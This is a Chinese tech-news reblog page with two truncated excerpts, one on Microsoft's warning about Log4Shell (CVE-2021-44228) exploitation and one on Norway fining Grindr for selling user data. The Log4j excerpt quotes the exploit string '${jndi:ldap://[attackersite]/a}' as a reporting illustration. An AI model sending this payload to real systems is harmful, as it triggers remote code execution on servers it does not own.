首页 文章 精选 留言 我的
优秀的个人博客,低调大师

微信关注我们

原文链接:http://netsecurity.51cto.com/art/202112/695560.htm

转载内容版权归作者及来源网站所有!

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

微软警告比SolarWinds影响更深远的Log4j2漏洞利用

WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元! 微软再次发出了来自具有深厚背景的黑客组织的网络攻击预警,可知问题源于 Java 日志库的 Log4j2 漏洞(CVE-2021-44228)。这家雷德蒙德科技巨头指出,世界多地的黑客已开始利用这项更复杂的日志协议技术,来远程访问受害者的设备。目前观察到的大部分攻击,主要涉及各路人马的大规模扫描。 据悉,微软旗下的多个威胁情报团队 —— 包括 MSTIC 威胁情报中心、 Microsoft 365 Defender 威胁情报团队、RiskIQ 和 DART 检测响应团队 —— 一直在密切关注 Apache Log4j2 的远程代码执行(RCE)漏洞。 CVE-2021-44228 漏洞披露公告指出,被称作“Log4Shell”的漏洞攻击,往往在 Web 日志请求中包含如下字符串: ${jndi:ldap://[attackersite]/a} 美国网络安全和基础设施安全局(CISA)也证实了微软的说法,此前该机构同样通报了 Log4Shell 漏洞的广泛利用。 CISA 负责人 Jen Easterly 于昨日接受 C...

未经明确同意出售用户数据,交友应用Grindr被罚650万欧元

WOT全球技术创新大会2022,门票6折抢购中!购票立减2320元! 12月15日,著名约会交友应用Grindr被挪威数据保护局(DPA)罚款650万欧元(约合人民币4963万),原因是Grindr“严重”违反GDPR规则,未经用户明确同意向广告商出售位置、IP、年龄等用户个人数据。 Grindr未经用户明确同意出售敏感个人信息 挪威DPA国际部负责人Tobias Judin解释,“我们认为,Grindr在没有法律依据的情况下向第三方披露了用户数据并用于广告。这与GDPR的‘有效同意’要求相违背。” 用户被迫同意该公司的隐私政策,但隐私政策中没有询问用户是否同意将其数据用于广告等行为。这些数据包括用户GPS位置、IP地址、广告ID、年龄和性别。由于这是一款为性少数群体提供约会的应用程序,这意味着用户的性取向数据被曝光。 调查起源于挪威消费者委员会在2020年向Grindr提出诉讼,称其正积极向多个第三方出售用户敏感信息。 挪威DPA起初向Grindr开出了860万英镑的罚单,但在Grindr提供相关财务细节并更改应用内的权限许可后,DPA将这一数字降到了650万欧元。但该数字依然是挪威...

相关文章

发表评论

资源下载

更多资源
Mario

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长,特征是大鼻子、头戴帽子、身穿背带裤,还留着胡子。与他的双胞胎兄弟路易基一起,长年担任任天堂的招牌角色。

腾讯云软件源

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题,腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构,目前腾讯云软件源站支持公网访问和内网访问。

Sublime Text

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能,例如代码缩略图,Python的插件,代码段等。还可自定义键绑定,菜单和工具栏。Sublime Text 的主要功能包括:拼写检查,书签,完整的 Python API , Goto 功能,即时项目切换,多选择,多窗口等等。Sublime Text 是一个跨平台的编辑器,同时支持Windows、Linux、Mac OS X等操作系统。

WebStorm

WebStorm

WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的HTML5编辑器”、“最智能的JavaScript IDE”等。与IntelliJ IDEA同源,继承了IntelliJ IDEA强大的JS部分的功能。

用户登录
用户注册